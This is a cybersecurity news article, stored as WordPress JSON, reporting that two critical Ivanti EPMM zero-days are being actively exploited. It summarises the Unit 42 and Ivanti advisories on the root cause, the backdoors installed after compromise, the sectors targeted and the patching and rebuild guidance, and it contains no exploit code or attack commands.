{"id":7211,"date":"2026-02-23T10:32:31","date_gmt":"2026-02-23T10:32:31","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7211"},"modified":"2026-02-23T10:32:31","modified_gmt":"2026-02-23T10:32:31","slug":"attackers-exploit-ivanti-epmm-zero-days-to-seize-control-of-mdm-servers","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7211","title":{"rendered":"Attackers exploit Ivanti EPMM zero-days to seize control of MDM servers"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n

Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti\u2019s Endpoint Manager Mobile (EPMM) to gain unauthenticated control of enterprise mobile device management infrastructure and install backdoors engineered to persist even after organizations apply available patches.<\/p>\n

\u201cTwo critical zero-day vulnerabilities (CVE-2026-1281<\/a>\u00a0and\u00a0CVE-2026-1340<\/a>) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks,\u201d Palo Alto Networks\u2019 Unit 42 threat research team said in an advisory<\/a>. \u201cThese vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.\u201d<\/p>\n

EPMM, formerly known as MobileIron Core, is a mobile device management platform that enterprises use to manage and enforce security policies on employee smartphones and tablets.<\/p>\n

Palo Alto Networks\u2019 attack surface management platform Cortex Xpanse found more than 4,400 EPMM instances currently exposed on the public internet. Compromise of the platform gives attackers access to device policies, credentials, and metadata across an organization\u2019s entire mobile fleet, Unit 42 warned in the advisory.<\/p>\n

Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to execute arbitrary commands on exposed EPMM servers without any user interaction or valid credentials.<\/p>\n

Ivanti acknowledged the attacks when it released emergency patches in late January, but described the initial impact as limited. \u201cWe are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,\u201d the company said in its security advisory<\/a>.<\/p>\n

Both vulnerabilities stem from unsafe Bash script handling in legacy Apache web server configurations, according to Unit 42. CVE-2026-1281 targets the In-House Application Distribution feature; CVE-2026-1340 exploits the same flaw class through a separate script handling the Android File Transfer mechanism. \u201cAlthough the root cause is the same, they reside in two distinct scripts handling different features,\u201d the advisory explained.<\/p>\n

From scan to backdoor<\/h2>\n

Unit 42 documented threat actors moving rapidly from automated scanning to initial access and then escalating quickly to deploy persistent backdoors designed to outlast patching cycles.<\/p>\n

After gaining initial access, attackers immediately attempted to download and execute a second-stage payload. \u201cThis second stage typically installs a web shell, a cryptominer, or a persistent backdoor to grant the attacker control of the appliance,\u201d the advisory said.<\/p>\n

Unit 42 also said attackers deployed the Nezha open-source monitoring agent to maintain visibility over compromised systems.<\/p>\n

The attackers targeted sectors including state and local government, healthcare, manufacturing, professional services, and high technology across the United States, Germany, Australia, and Canada, the advisory added.<\/p>\n

Unit 42 also warned that proof-of-concept exploit code for both CVEs is already publicly available, making broader exploitation likely as more threat actors adopt working exploits.<\/p>\n

Patch, but verify first<\/h2>\n

Unit 42 directed organizations to Ivanti\u2019s security advisory for remediation guidance, which recommends applying version-specific RPM patches for EPMM 12.x branches that require no appliance downtime. Ivanti cautioned, however, that the patch does not survive a version upgrade and must be reinstalled if the software is updated. \u201cThe permanent fix for this vulnerability will be included in the next product release: 12.8.0.0 expected in Q1 2026.\u2019<\/p>\n

Ivanti also warned in its advisory that while its Sentry mobile traffic gateway is not directly vulnerable, EPMM holds command execution permissions on connected Sentry systems.\u201dIf an EPMM deployment has been compromised, the attackers might have compromised Ivanti Sentry as well,\u201d Ivanti warned.<\/p>\n

For organizations that suspect compromise, the Ivanti advisory suggested against attempting to clean affected systems. Instead, it recommended restoring from a known-good backup or performing a full rebuild, followed by a complete reset of all account passwords, service credentials, and public certificates. With proof-of-concept exploit code already publicly available for both CVEs, broader exploitation is expected as more threat actors adopt working exploits.<\/p>\n

A familiar pattern<\/h2>\n

The targeting of EPMM follows a pattern that will be familiar to Ivanti customers. The product has been exploited at scale before \u2014 in 2023, state-sponsored attackers used EPMM zero-days to break into Norwegian government networks<\/a>, and separate flaws were again exploited<\/a> in the wild last year. <\/p>\n

Ivanti\u2019s Connect Secure VPN product has had a similarly troubled record, with Chinese APT groups<\/a> exploiting zero-days in back-to-back campaigns that eventually led the US government to order federal agencies to disconnect Ivanti VPN products entirely in February 2024.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti\u2019s Endpoint Manager Mobile (EPMM) to gain unauthenticated control of enterprise mobile device management infrastructure and install backdoors engineered to persist even after organizations apply available patches. \u201cTwo critical zero-day vulnerabilities (CVE-2026-1281\u00a0and\u00a0CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting […]<\/p>\n","protected":false},"author":0,"featured_media":7212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7211","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7211"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7211"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7211\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7212"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}